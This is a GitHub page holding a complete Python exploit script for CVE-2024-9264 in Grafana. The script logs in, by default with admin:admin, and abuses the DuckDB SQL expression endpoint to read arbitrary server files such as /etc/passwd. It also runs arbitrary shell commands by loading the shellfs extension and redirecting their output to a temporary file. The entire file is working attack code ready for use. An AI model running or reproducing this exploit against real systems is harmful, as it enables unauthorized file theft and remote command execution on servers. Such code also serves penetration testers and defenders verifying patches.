-
Notifications
You must be signed in to change notification settings - Fork 17
/
Copy pathCVE-2024-9264.py
executable file
·162 lines (133 loc) · 5.31 KB
/
CVE-2024-9264.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
#!/usr/bin/env python3
# https://github.com/nollium/CVE-2024-9264/tree/main
# - Requirements (install with pip):
# ten
# psycopg2-binary
from ten import *
from tenlib.flow.console import get_console
from typing import cast, List, Dict, Optional, Any
from psycopg2.extensions import adapt
import sys
# Force ten to output to stderr so the user can redirect the file output separately from the message log
# E.g: python3 CVE-2024-9264.py -f /etc/passwd http://localhost:3000 > file.txt 2> logs.txt
console = get_console()
console.stderr = True
@inform("Logging in with provided or default credentials")
def authenticate(session: ScopedSession, user: str, password: str) -> None:
path = "/login"
data = {"password": password, "user": user}
res = session.post(path, json=data)
msg = res.json()["message"]
if msg == "Logged in":
msg_success(f"Logged in as {user}:{password}")
else:
failure(f"Failed to log in as {user}:{password}")
@inform("Running duckdb query")
def run_query(session: ScopedSession, query: str) -> Optional[List[Any]]:
path = "/api/ds/query?ds_type=__expr__&expression=true&requestId=Q101"
data = {
"from": "1729313027261",
"queries": [
{
"datasource": {
"name": "Expression",
"type": "__expr__",
"uid": "__expr__",
},
"expression": query,
"hide": False,
"refId": "B",
"type": "sql",
"window": "",
}
],
"to": "1729334627261",
}
res = session.post(path, json=data)
data = cast(Dict, res.json())
# Check for DuckDB not found error
if "results" in data and "B" in data["results"]:
result = data["results"]["B"]
if "error" in result and "no such file or directory" in result["error"]:
failure("DuckDB is not installed on the target system. This exploit requires DuckDB to be present in the system PATH.")
return None
if data.get("message"):
msg_failure("Received unexpected response:")
msg_failure(json.encode(data, indent=4)) # prettify json
return None
try:
values = data["results"]["B"]["frames"][0]["data"]["values"]
values = cast(List, values)
if len(values) == 0:
failure("File not found")
return None
msg_success("Successfully ran duckdb query:")
msg_success(f"{query}:")
return values
except (KeyError, IndexError):
msg_failure("Unexpected response format:")
msg_failure(json.encode(data, indent=4))
return None
# Output's non-printable characters are unicode escaped
def decode_output(values: List[str]) -> bytes:
content = values[0][0]
decoded = content.encode("utf-8").decode("unicode_escape").encode("latin1")
return decoded
def read_remote_file(session: ScopedSession, filepath: str) -> Optional[bytes]:
"""Read a file from the remote server using read_blob."""
escaped_filename = adapt(filepath)
query = f"SELECT content FROM read_blob({escaped_filename})"
result = run_query(session, query)
if result:
return decode_output(result)
return None
def execute_command(session: ScopedSession, command: str) -> Optional[bytes]:
"""Execute a command and return its output using shellfs."""
tmp_file = "/tmp/grafana_cmd_output"
# Install and load shellfs if not already loaded
full_query = (
"SELECT 1;"
"install shellfs from community;"
"LOAD shellfs;"
f"SELECT * FROM read_csv('{command} >{tmp_file} 2>&1 |')"
)
# Execute command and redirect output to a temporary file
run_query(session, full_query)
# Read the output file using the common function
return read_remote_file(session, tmp_file)
@entry
@arg("url", "URL of the Grafana instance to exploit")
@arg("user", "Username to log in as, defaults to 'admin'")
@arg("password", "Password used to log in, defaults to 'admin'")
@arg("file", "File to read on the server, defaults to '/etc/passwd'")
@arg("query", "Optional query to run instead of reading a file")
@arg("command", "Optional command to execute on the server")
def main(url, user="admin", password="admin", file=None, query=None, command=None):
"""Exploit for Grafana post-auth file-read and RCE (CVE-2024-9264)."""
if sum(1 for x in [file, query, command] if x is not None) > 1:
failure("Cannot specify more than one of: file, query, or command arguments.")
session = ScopedSession(base_url=url)
authenticate(session, user, password)
if command:
msg_success(f"Executing command: {command}")
output = execute_command(session, command)
if output:
console.file.flush()
console.stderr = False
bin_print(output)
return
if not query:
file = file or "/etc/passwd"
msg_success(f"Reading file: {file}")
content = read_remote_file(session, file)
if content:
console.file.flush()
console.stderr = False
bin_print(content)
return
# Handle direct query execution
content = run_query(session, query)
if content:
print(json.encode(content, indent=4))
# pylint: disable=no-value-for-parameter
main()